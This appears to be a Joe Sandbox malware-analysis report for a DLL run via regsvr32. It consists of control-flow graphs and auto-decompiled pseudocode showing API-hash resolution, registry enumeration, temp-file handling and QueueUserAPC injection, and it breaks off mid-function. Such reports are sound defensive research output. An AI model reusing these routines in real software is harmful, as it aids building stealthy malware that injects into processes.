                  control_flow_graph 38 18000508c-1800050da HeapAlloc 39 180005419 38->39 40 1800050e0-180005112 memset InitializeCriticalSection call 180008b44 38->40 42 18000541e-18000543a 39->42 44 180005118-180005131 call 180007678 call 18000459c 40->44 45 18000540f-180005417 call 180005578 40->45 52 180005133-180005142 44->52 53 180005144 44->53 45->42 54 180005147-18000514e 52->54 53->54 56 18000515b-180005184 HeapAlloc 54->56 57 180005150-180005156 GetLastError 54->57 58 180005226 56->58 59 18000518a-1800051b0 RegOpenKeyW 56->59 60 180005408-18000540d 57->60 63 18000522b-18000522e 58->63 61 1800051b2-1800051b4 59->61 62 180005216-180005224 HeapFree 59->62 60->42 60->45 64 1800051cf-1800051ec RegEnumKeyW 61->64 62->63 63->45 65 180005234-180005280 memcpy call 180005ca4 63->65 66 1800051b6-1800051ca call 180009110 64->66 67 1800051ee-1800051f7 64->67 73 180005282-18000529a call 180005ca4 65->73 74 18000529c-18000529f 65->74 66->67 78 1800051cc 66->78 70 180005203-180005214 RegCloseKey 67->70 71 1800051f9-180005200 67->71 70->62 70->65 71->70 73->74 74->45 77 1800052a5-1800052b6 call 180006dcc 74->77 82 1800052e2-1800052e5 77->82 83 1800052b8-1800052cc call 180003c24 77->83 78->64 82->45 85 1800052eb-1800052f6 call 180008708 82->85 83->82 89 1800052ce-1800052de call 180003c24 83->89 90 180005302-180005323 85->90 91 1800052f8-1800052fd 85->91 89->82 93 180005325-18000532d 90->93 94 180005339 90->94 91->45 96 18000533c-18000533f 93->96 97 18000532f-180005337 call 180004ed8 93->97 94->96 99 180005341-180005346 96->99 100 18000534b-180005355 96->100 97->96 99->45 102 180005357-18000535f 100->102 103 18000536e 100->103 104 180005371-180005374 102->104 105 180005361-18000536c call 180004ed8 102->105 103->104 104->99 106 180005376-180005391 GetModuleHandleA 104->106 105->104 108 180005393-1800053a7 call 18000459c 106->108 109 1800053fb-180005403 call 180002b60 106->109 114 1800053a9-1800053bc GetCurrentThreadId 108->114 115 1800053be 108->115 109->60 116 1800053c1-1800053c4 114->116 115->116 116->57 118 1800053ca-1800053db call 18000459c 116->118 121 1800053dd-1800053ec QueueUserAPC 118->121 122 1800053ee 118->122 123 1800053f1-1800053f4 121->123 122->123 123->42 124 1800053f6 123->124 124->57
                  C-Code - Quality: 51%
                  			E0000000118000508C(void* __ecx, void* __esi, long long __rax, long long __rbx, long long __rcx, void* __r9) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t55;
                  				long _t57;
                  				void* _t65;
                  				void* _t114;
                  				void* _t115;
                  				long long* _t146;
                  				void* _t147;
                  				void* _t153;
                  				int _t188;
                  				long long _t189;
                  				int _t191;
                  				long long _t192;
                  				struct _CRITICAL_SECTION* _t198;
                  				void* _t201;
                  				void* _t202;
                  				signed short* _t211;
                  				void* _t214;
                  				void* _t215;
                  				long long _t216;
                  				void* _t217;
                  				long _t219;
                  				long _t223;
                  				void* _t225;
                  
                  				_t154 = __rbx;
                  				_t146 = __rax;
                  				_t115 = __esi;
                  				 *((long long*)(_t201 + 0x20)) = __rbx;
                  				 *((long long*)(_t201 + 8)) = __rcx;
                  				_t202 = _t201 - 0x230;
                  				_t199 =  *0x8000d4a0;
                  				r14d =  *0x8000d498;
                  				HeapAlloc(_t225, _t223, _t219);
                  				r12d = 0;
                  				_t189 = __rax;
                  				if (__rax == _t217) goto 0x80005419;
                  				memset(_t217, _t188, _t191);
                  				InitializeCriticalSection(_t198);
                  				_t5 = _t189 + 0x98; // 0x98
                  				_t216 = _t5;
                  				 *_t216 = _t216;
                  				 *((long long*)(__rax + 0xa0)) = _t216;
                  				if (E00000001180008B44(__ecx, __rax - _t217, __rax, __rbx, _t191, __rbx, _t214) != r12d) goto 0x8000540f;
                  				E00000001180007678(__ecx, __rax, _t154, _t191);
                  				E0000000118000459C(0xdc444c2b, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t146 == _t217) goto 0x80005144;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t146();
                  				goto 0x80005147;
                  				_t147 = _t217;
                  				 *(_t189 + 0x28) = _t147;
                  				if (_t147 != _t217) goto 0x8000515b;
                  				GetLastError();
                  				goto 0x80005408;
                  				r8d = 0x1102;
                  				HeapAlloc(??, ??, ??);
                  				_t192 =  *0x8000d4a0;
                  				if (_t192 == _t217) goto 0x80005226;
                  				 *_t192 = r12w; // executed
                  				_t55 = RegOpenKeyW(??, ??, ??); // executed
                  				if (_t55 != r12d) goto 0x80005216;
                  				goto 0x800051cf;
                  				r12d = r12d + 1;
                  				if (E00000001180009110(0x180000000, _t154, _t192, _t202 + 0x20, _t192, _t202 + 0x278, _t214) != 0) goto 0x800051ee;
                  				r9d = 0x104; // executed
                  				_t57 = RegEnumKeyW(??, ??, ??, ??); // executed
                  				if (_t57 == 0) goto 0x800051b6;
                  				r12d = 0;
                  				if (_t57 != 0x103) goto 0x80005203;
                  				 *0x8000d480 = _t192;
                  				RegCloseKey(??); // executed
                  				if (r12d == r12d) goto 0x80005234;
                  				HeapFree(??, ??, ??);
                  				goto 0x8000522b;
                  				if (8 != r12d) goto 0x8000540f;
                  				_t193 =  *0x8000d490;
                  				r8d = 8;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t202 + 0x286)) = r12w;
                  				if (E00000001180005CA4(8, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x180011198) == r12d) goto 0x8000529c;
                  				if (E00000001180005CA4(_t61, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x1800111f0) != r12d) goto 0x8000540f;
                  				_t28 = _t189 + 8; // 0x8
                  				_t186 = _t28;
                  				if (E00000001180006DCC(_t154, _t189, _t28, _t189, _t193) != r12d) goto 0x800052e2;
                  				E00000001180003C24(_t154, _t189, _t28, _t189, _t193,  *0x8000d4a0);
                  				 *((long long*)(_t189 + 0x30)) = 0x180000000;
                  				if (0x180000000 == _t217) goto 0x800052e2;
                  				_t30 = _t189 + 8; // 0x8
                  				_t65 = E00000001180003C24(_t154, _t30, _t28, _t189, _t193,  *0x8000d4a0);
                  				 *((long long*)(_t189 + 0x38)) = 0x180000000;
                  				_t90 =  !=  ? r12d : 8;
                  				_t132 = ( !=  ? r12d : 8) - r12d;
                  				if (( !=  ? r12d : 8) != r12d) goto 0x8000540f;
                  				if (E00000001180008708(_t65, _t114, _t154, _t189, _t186) != r12d) goto 0x80005302;
                  				goto 0x8000540f;
                  				_t211 =  *0x8000d490 + 0x18000f000;
                  				r9d = _t211[1] & 0x0000ffff;
                  				r11d =  *_t211 & 0x0000ffff;
                  				_t215 = __r9 + 8;
                  				if (_t216 - _t215 <= 0) goto 0x80005339;
                  				if ((r14d ^ 0xe49a1e6d) == r12d) goto 0x8000533c;
                  				E00000001180004ED8(r14d ^ 0xe49a1e6d, __r9 +  &(_t211[4]));
                  				goto 0x8000533c;
                  				if (_t217 != _t217) goto 0x8000534b;
                  				goto 0x8000540f;
                  				r14d = r14d ^ 0xecb028fc;
                  				if (_t216 - _t215 <= 0) goto 0x8000536e;
                  				if (r14d == r12d) goto 0x80005371;
                  				E00000001180004ED8(r14d, __r9 +  &(_t211[4]));
                  				goto 0x80005371;
                  				_t153 = _t217;
                  				if (_t153 == _t217) goto 0x80005341;
                  				 *(_t189 + 0x40) = _t211;
                  				 *0x8000d488 = _t189;
                  				GetModuleHandleA(??);
                  				if (_t153 ==  *((intOrPtr*)(_t202 + 0x270))) goto 0x800053fb;
                  				E0000000118000459C(0xaade337c, _t153,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t153 == _t217) goto 0x800053be;
                  				r8d = GetCurrentThreadId();
                  				 *_t153();
                  				goto 0x800053c1;
                  				if (_t217 == _t217) goto 0x80005150;
                  				E0000000118000459C(0x1c8cff93, _t153,  *((intOrPtr*)(_t199 + 0x18)));
                  				if (_t153 == _t217) goto 0x800053ee;
                  				QueueUserAPC(??, ??, ??); // executed
                  				goto 0x800053f1;
                  				if (r12d != r12d) goto 0x8000541e;
                  				goto 0x80005150;
                  				asm("lock add dword [ebp+0x38], 0x1");
                  				if (E00000001180002B60(_t115, _t189, __r9, _t215, _t216) == r12d) goto 0x8000541e;
                  				E00000001180005578(_t154, _t189, _t217);
                  				goto 0x8000541e;
                  				return 8;
                  			}





























                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x180005091
                  0x1800050a1
                  0x1800050a8
                  0x1800050b6
                  0x1800050cb
                  0x1800050d1
                  0x1800050d4
                  0x1800050da
                  0x1800050e8
                  0x1800050f1
                  0x1800050f7
                  0x1800050f7
                  0x1800050fe
                  0x180005101
                  0x180005112
                  0x18000511b
                  0x180005129
                  0x180005131
                  0x180005138
                  0x18000513b
                  0x180005140
                  0x180005142
                  0x180005144
                  0x180005147
                  0x18000514e
                  0x180005150
                  0x180005156
                  0x180005164
                  0x180005171
                  0x180005177
                  0x180005184
                  0x1800051a1
                  0x1800051a5
                  0x1800051b0
                  0x1800051b4
                  0x1800051be
                  0x1800051ca
                  0x1800051dc
                  0x1800051e2
                  0x1800051ec
                  0x1800051ee
                  0x1800051f7
                  0x1800051f9
                  0x18000520b
                  0x180005214
                  0x18000521e
                  0x180005224
                  0x18000522e
                  0x180005234
                  0x180005248
                  0x18000524e
                  0x18000526d
                  0x180005280
                  0x18000529f
                  0x1800052a5
                  0x1800052a5
                  0x1800052b6
                  0x1800052c0
                  0x1800052c5
                  0x1800052cc
                  0x1800052ce
                  0x1800052d2
                  0x1800052da
                  0x1800052de
                  0x1800052e2
                  0x1800052e5
                  0x1800052f6
                  0x1800052fd
                  0x180005302
                  0x18000530d
                  0x180005312
                  0x18000531c
                  0x180005323
                  0x18000532d
                  0x180005332
                  0x180005337
                  0x18000533f
                  0x180005346
                  0x18000534b
                  0x180005355
                  0x18000535f
                  0x180005367
                  0x18000536c
                  0x18000536e
                  0x180005374
                  0x180005378
                  0x18000537c
                  0x180005383
                  0x180005391
                  0x18000539c
                  0x1800053a7
                  0x1800053b4
                  0x1800053b7
                  0x1800053bc
                  0x1800053c4
                  0x1800053d3
                  0x1800053db
                  0x1800053ea
                  0x1800053ec
                  0x1800053f4
                  0x1800053f6
                  0x1800053fb
                  0x18000540d
                  0x180005412
                  0x180005417
                  0x18000543a

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: HandleModule$Heap$AllocErrorLast$CloseCriticalCurrentEnumFreeInitializeOpenQueueSectionThreadUsermemcpymemset
                  • String ID:
                  • API String ID: 909755087-0
                  • Opcode ID: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction ID: 9261d350846713a6d61e62943f4705d1cd3b2ba236d4958cf944a875f2eb3085
                  • Opcode Fuzzy Hash: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction Fuzzy Hash: 1AA15C32204B4D92EAE6DB22E4953EE7391B78C7C5F50C421EA8A47795DE78CB9DC301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 125 180001844-180001874 126 18000187a-18000187d 125->126 127 180001a6f-180001a85 125->127 126->127 128 180001883-180001893 call 180007b04 126->128 131 180001899-1800018b3 GetTempPathW 128->131 132 180001a6a 128->132 133 180001a55 131->133 134 1800018b9-1800018cf HeapAlloc 131->134 132->127 135 180001a5a-180001a68 HeapFree 133->135 134->133 136 1800018d5-1800018e3 GetTempPathW 134->136 135->127 137 1800018e5-180001914 GetSystemTimeAsFileTime GetCurrentThreadId GetTempFileNameW 136->137 138 180001916-180001924 HeapFree 136->138 137->138 139 180001927-18000192a 137->139 138->139 139->133 140 180001930-180001935 139->140 141 180001938-18000194f StrChrW 140->141 142 180001951-180001962 141->142 143 180001964-180001972 lstrlenW 141->143 144 180001976-180001979 142->144 143->144 145 1800019a7-1800019ab 144->145 146 18000197b-180001986 144->146 149 1800019b9-1800019c4 145->149 150 1800019ad-1800019b7 145->150 147 180001988-18000198c 146->147 148 18000198e-180001997 146->148 147->148 151 180001999-18000199c 147->151 148->146 148->151 152 1800019c6-1800019d7 call 180009b7c 149->152 153 1800019ef-1800019f2 149->153 150->151 151->145 154 18000199e-1800019a5 151->154 158 1800019dc-1800019e0 152->158 156 1800019f4-180001a0d call 180003698 153->156 157 180001a3c-180001a53 DeleteFileW HeapFree 153->157 154->145 154->150 156->157 162 180001a0f-180001a36 call 180005bdc HeapFree 156->162 157->135 158->157 161 1800019e2-1800019e8 158->161 161->156 163 1800019ea 161->163 162->157 163->141
                  C-Code - Quality: 15%
                  			E00000001180001844(long long __rbx, void* __rcx, intOrPtr* __rdx, long long _a8, int _a16, char _a24, signed int _a32) {
                  				signed long long _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t27;
                  				int _t32;
                  				int _t34;
                  				void* _t36;
                  				int _t53;
                  				int _t61;
                  				intOrPtr _t68;
                  				intOrPtr _t69;
                  				intOrPtr* _t92;
                  				signed long long _t93;
                  				intOrPtr* _t106;
                  				void* _t118;
                  				void* _t121;
                  				intOrPtr* _t122;
                  				intOrPtr* _t123;
                  				void* _t125;
                  				signed long long _t132;
                  				void* _t140;
                  				void* _t145;
                  
                  				_t94 = __rbx;
                  				_a8 = __rbx;
                  				_t92 =  *0x8000d4a0;
                  				r12d = 0;
                  				_t145 = __rcx;
                  				if (__rdx == _t140) goto 0x80001a6f;
                  				if ( *__rdx == r12b) goto 0x80001a6f;
                  				E00000001180007B04(__rbx, __rdx, _t118, _t121, _t125, __rdx);
                  				if (_t92 == _t140) goto 0x80001a6a;
                  				_t93 =  *0x8000d4a0;
                  				_t27 = GetTempPathW(??, ??);
                  				if (_t27 == r12d) goto 0x80001a55;
                  				HeapAlloc(??, ??, ??);
                  				if (_t93 == _t140) goto 0x80001a55;
                  				if (GetTempPathW(??, ??) == r12d) goto 0x80001916;
                  				GetSystemTimeAsFileTime(??);
                  				r8d = GetCurrentThreadId() ^ _a32; // executed
                  				_t32 = GetTempFileNameW(??, ??, ??, ??); // executed
                  				if (_t32 != r12d) goto 0x80001927;
                  				_t132 = _t93;
                  				HeapFree(??, ??, ??);
                  				if (_t140 == _t140) goto 0x80001a55;
                  				_t122 = _t92;
                  				__imp__StrChrW();
                  				r8d = 0;
                  				if (_t93 == _t132) goto 0x80001964;
                  				_a16 = _t27;
                  				goto 0x80001976;
                  				_t106 = _t122;
                  				_t34 = lstrlenW(??);
                  				r8d = 0;
                  				_a16 = _t34;
                  				if (_t34 == r8d) goto 0x800019a7;
                  				_t11 = _t106 - 1; // -1
                  				_t61 = _t11;
                  				_t68 =  *((intOrPtr*)(_t122 + _t93 * 2));
                  				if (_t68 == 0x20) goto 0x8000198e;
                  				if (_t68 != 9) goto 0x80001999;
                  				_t53 = _t61;
                  				_a16 = _t61;
                  				if (_t61 != r8d) goto 0x8000197b;
                  				if (_t53 == r8d) goto 0x800019a7;
                  				_t69 =  *_t122;
                  				if (_t69 == 0x20) goto 0x800019ad;
                  				if (_t69 != 9) goto 0x800019b9;
                  				_t123 = _t122 + 2;
                  				_a16 = _t53 - 1;
                  				goto 0x80001999;
                  				 *((intOrPtr*)(_t123 + _t93 * 2)) = r8w;
                  				if ( *_t123 == r8w) goto 0x800019ef;
                  				_v72 = _t132;
                  				r9d = 0;
                  				_t36 = E00000001180009B7C(_t94, _t145, _t123, _t140, _t123,  *((intOrPtr*)(_t93 + 8)), _t140);
                  				if (_t36 != 0) goto 0x80001a3c;
                  				if (_t93 + 2 == 0) goto 0x800019f4;
                  				goto 0x80001938;
                  				if (_t36 != r8d) goto 0x80001a3c;
                  				if (E00000001180003698(_t36 - r8d, _t94, _t140,  &_a24,  *((intOrPtr*)(_t93 + 8)),  &_a16, _t93) != 0) goto 0x80001a3c;
                  				r9d = _a16;
                  				E00000001180005BDC(_t94, _t145, _t93 + 2,  *((intOrPtr*)(_t93 + 8)), _a24);
                  				HeapFree(??, ??, ??);
                  				DeleteFileW(??); // executed
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a5a;
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a6f;
                  				return 8;
                  			}


























                  0x180001844
                  0x180001844
                  0x180001858
                  0x18000185f
                  0x180001869
                  0x180001874
                  0x18000187d
                  0x180001888
                  0x180001893
                  0x180001899
                  0x1800018a8
                  0x1800018b3
                  0x1800018c3
                  0x1800018cf
                  0x1800018e3
                  0x1800018ed
                  0x180001908
                  0x18000190b
                  0x180001914
                  0x180001916
                  0x18000191e
                  0x18000192a
                  0x180001935
                  0x180001940
                  0x180001946
                  0x18000194f
                  0x18000195e
                  0x180001962
                  0x180001964
                  0x180001967
                  0x18000196d
                  0x180001972
                  0x180001979
                  0x18000197b
                  0x18000197b
                  0x18000197e
                  0x180001986
                  0x18000198c
                  0x18000198e
                  0x180001990
                  0x180001997
                  0x18000199c
                  0x18000199e
                  0x1800019a5
                  0x1800019ab
                  0x1800019ad
                  0x1800019b3
                  0x1800019b7
                  0x1800019bb
                  0x1800019c4
                  0x1800019c6
                  0x1800019cb
                  0x1800019d7
                  0x1800019e0
                  0x1800019e8
                  0x1800019ea
                  0x1800019f2
                  0x180001a0d
                  0x180001a0f
                  0x180001a22
                  0x180001a36
                  0x180001a3f
                  0x180001a4d
                  0x180001a53
                  0x180001a62
                  0x180001a68
                  0x180001a85

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Free$FileTemp$AllocPathTimelstrlen$CurrentDeleteNameSystemThreadmemset
                  • String ID:
                  • API String ID: 2968359827-0
                  • Opcode ID: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction ID: f42bf4f4e696ed8dde712627642a23392779c5e7d82fb71db4855592268e1331
                  • Opcode Fuzzy Hash: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction Fuzzy Hash: 1C51C931704548CAF7E6DB26A8543EA7691B78DBC1F54C015FE4687BA4EE3C8A4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 177 180004a14-180004a57 call 18000459c 180 180004a75 177->180 181 180004a59-180004a69 177->181 182 180004a77-180004a79 180->182 183 180004a73 181->183 184 180004a7f-180004a99 call 180006d04 182->184 185 180004c20-180004c26 GetLastError 182->185 183->182 188 180004a9e-180004aa2 184->188 186 180004c28-180004c4a 185->186 189 180004c02-180004c13 call 18000459c 188->189 190 180004aa8-180004acd memset call 18000459c 188->190 189->186 197 180004c15-180004c1e 189->197 195 180004ae3 190->195 196 180004acf-180004ae1 190->196 198 180004ae5-180004ae7 195->198 196->198 197->186 199 180004af9-180004afb 198->199 200 180004ae9-180004af3 GetLastError 198->200 203 180004afd-180004b2c memcpy 199->203 200->189 200->199 204 180004b2e-180004b3b call 18000459c 203->204 205 180004b70-180004b7d call 18000459c 203->205 210 180004baa 204->210 211 180004b3d-180004b6e 204->211 205->210 212 180004b7f-180004ba8 205->212 213 180004bac-180004bae 210->213 211->213 212->213 214 180004bd6-180004bdc GetLastError 213->214 215 180004bb0-180004bcf memcpy 213->215 219 180004bde-180004bf9 call 18000459c 214->219 218 180004bd1 215->218 215->219 218->203 219->189 222 180004bfb 219->222 222->189
                  C-Code - Quality: 24%
                  			E00000001180004A14(void* __ebx, void* __ecx, long long* __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24, long long* _a40, void* _a48, intOrPtr _a56) {
                  				void* _v40;
                  				char _v80;
                  				intOrPtr _v88;
                  				char _v96;
                  				char _v104;
                  				intOrPtr _v120;
                  				long long _v128;
                  				long long _v136;
                  				char _t57;
                  				intOrPtr _t95;
                  				void* _t96;
                  				long long* _t114;
                  				long long* _t115;
                  
                  				_t114 = __rax;
                  				_a8 = __rbx;
                  				_a16 = __rbp;
                  				_a24 = __rsi;
                  				_t141 =  *0x8000d4a0;
                  				r14d = __ecx;
                  				_t95 = r8d;
                  				E0000000118000459C(0x4e1c2e77, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004a75;
                  				r9d = 0x18;
                  				r8d = 0;
                  				_v136 = 0xf0000040;
                  				 *_t114(); // executed
                  				goto 0x80004a77;
                  				if (0 == 0) goto 0x80004c20;
                  				r8d = _a56;
                  				_t10 =  &_v96; // -190
                  				if (E00000001180006D04(__rbx, _v88, __rsi, _t10) != 0) goto 0x80004c02;
                  				_t11 = _t114 + 0x10; // 0x10
                  				r15d = _t11;
                  				memset(??, ??, ??);
                  				E0000000118000459C(0xd74cfe41, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004ae3;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004ae5;
                  				if (0 != 0) goto 0x80004af9;
                  				if (GetLastError() != 0) goto 0x80004c02;
                  				_t57 =  >  ? r15d : _t95;
                  				r8d = _t57;
                  				_v104 = _t57;
                  				memcpy(??, ??, ??);
                  				_t96 = _t95 - _v104;
                  				if (r14d == 0) goto 0x80004b70;
                  				E0000000118000459C(0x4217c141, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t23 =  &_v104; // -198
                  				_v120 = 0x20;
                  				_v128 = _t23;
                  				_t26 =  &_v80; // -174
                  				r8b = _t96 == 0;
                  				_v136 = _t26;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004bac;
                  				E0000000118000459C(0x8ea73a36, _t114, _v96);
                  				if (_t114 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t29 =  &_v104; // -198
                  				_v128 = _t29;
                  				r8b = _t96 == 0;
                  				_t31 =  &_v80; // -174
                  				_v136 = _t31;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004bac;
                  				if (0 == 0) goto 0x80004bd6;
                  				r8d = _v104;
                  				memcpy(??, ??, ??);
                  				if (_t96 == 0) goto 0x80004bde;
                  				goto 0x80004afd;
                  				GetLastError();
                  				_t115 = _a40;
                  				 *_t115 = 0 + _v104;
                  				E0000000118000459C(0xff709000, _t115,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t115 == 0) goto 0x80004c02;
                  				 *_t115();
                  				E0000000118000459C(0xbaca8f4d, _t115,  *((intOrPtr*)(_t141 + 0x20)));
                  				if (_t115 == 0) goto 0x80004c28;
                  				 *_t115();
                  				goto 0x80004c28;
                  				return GetLastError();
                  			}
















                  0x180004a14
                  0x180004a14
                  0x180004a19
                  0x180004a1e
                  0x180004a33
                  0x180004a3a
                  0x180004a4c
                  0x180004a4f
                  0x180004a57
                  0x180004a5e
                  0x180004a64
                  0x180004a69
                  0x180004a71
                  0x180004a73
                  0x180004a79
                  0x180004a7f
                  0x180004a94
                  0x180004aa2
                  0x180004aa8
                  0x180004aa8
                  0x180004ab7
                  0x180004ac5
                  0x180004acd
                  0x180004adc
                  0x180004adf
                  0x180004ae1
                  0x180004ae7
                  0x180004af3
                  0x180004b07
                  0x180004b0e
                  0x180004b11
                  0x180004b15
                  0x180004b1e
                  0x180004b2c
                  0x180004b33
                  0x180004b3b
                  0x180004b3d
                  0x180004b40
                  0x180004b45
                  0x180004b4d
                  0x180004b52
                  0x180004b59
                  0x180004b5d
                  0x180004b67
                  0x180004b6c
                  0x180004b6e
                  0x180004b75
                  0x180004b7d
                  0x180004b7f
                  0x180004b82
                  0x180004b89
                  0x180004b8e
                  0x180004b92
                  0x180004b97
                  0x180004ba1
                  0x180004ba6
                  0x180004ba8
                  0x180004bae
                  0x180004bb0
                  0x180004bbd
                  0x180004bcf
                  0x180004bd1
                  0x180004bd6
                  0x180004bde
                  0x180004beb
                  0x180004bf1
                  0x180004bf9
                  0x180004c00
                  0x180004c0b
                  0x180004c13
                  0x180004c1c
                  0x180004c1e
                  0x180004c4a

                  APIs
                    • Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8
                  • memset.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AB7
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AE9
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004B15
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BBD
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BD6
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004C20
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorLast$memcpy$memset
                  • String ID: $@
                  • API String ID: 1408984137-1077428164
                  • Opcode ID: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction ID: 6549d2ab533297c31cadfe8b85b87dceba819ad31def954566d9370a515f3166
                  • Opcode Fuzzy Hash: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction Fuzzy Hash: A851607330574982EBA2DBA5A45079AB7A0FBCC7D0F548411BE8D87B49DF78CA08CB04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 275 1800027d4-18000281d call 180007b04 278 180002823-18000282b 275->278 279 180002a78-180002a7e GetLastError 275->279 280 18000282d 278->280 281 18000283e 278->281 282 180002a80-180002a99 279->282 283 180002835-18000283c 280->283 284 18000282f-180002833 280->284 285 180002846-180002857 call 18000459c 281->285 283->285 284->281 284->283 288 180002871 285->288 289 180002859-180002869 285->289 290 180002874-18000288a HeapFree 288->290 292 18000286f 289->292 290->279 291 180002890-180002897 290->291 293 180002899-1800028aa call 18000459c 291->293 294 1800028ce-1800028df call 180007b04 291->294 292->290 299 1800028c4 293->299 300 1800028ac-1800028c2 293->300 294->279 301 1800028e5-1800028f7 294->301 302 1800028c6-1800028c8 299->302 300->302 303 180002938 301->303 304 1800028f9-180002912 call 18000459c 301->304 302->279 302->294 305 18000293e-18000294f call 18000459c 303->305 310 180002914-180002920 304->310 311 180002927-180002936 304->311 313 180002951-180002961 305->313 314 180002963 305->314 310->311 311->305 315 180002966-18000297c HeapFree 313->315 314->315 315->279 317 180002982-180002993 call 180007b04 315->317 317->279 320 180002999-1800029aa call 18000459c 317->320 323 1800029ac-1800029e4 320->323 324 1800029ed 320->324 326 1800029eb 323->326 325 1800029f0-180002a06 HeapFree 324->325 325->279 327 180002a08-180002a26 call 18000459c 325->327 326->325 330 180002a28-180002a3e 327->330 331 180002a40 327->331 332 180002a42-180002a44 330->332 331->332 332->282 334 180002a46-180002a60 call 18000459c 332->334 334->282 337 180002a62-180002a76 334->337 337->282
                  C-Code - Quality: 26%
                  			E000000011800027D4(long long __rbx, intOrPtr* __rcx, void* __rdx) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t100;
                  				long long* _t119;
                  				long long* _t120;
                  				long long* _t121;
                  				long long* _t122;
                  				long long* _t123;
                  				void* _t151;
                  				void* _t152;
                  				intOrPtr* _t153;
                  				void* _t155;
                  				void* _t158;
                  				long long* _t161;
                  				void* _t163;
                  				void* _t164;
                  				long _t176;
                  				void* _t178;
                  				void* _t181;
                  				void* _t184;
                  
                  				_t123 = __rbx;
                  				 *((long long*)(_t163 + 0x10)) = __rbx;
                  				 *(_t163 + 0x18) = r8d;
                  				_t164 = _t163 - 0x50;
                  				_t119 =  *0x8000d4a0;
                  				_t156 =  *__rcx;
                  				_t153 = __rcx;
                  				r15d = r9d;
                  				E00000001180007B04(__rbx, __rdx, __rcx,  *__rcx, _t158, __rdx, _t184, _t181);
                  				if (_t119 == _t123) goto 0x80002a78;
                  				_t100 =  *((char*)(_t153 + 0x75)) - 6;
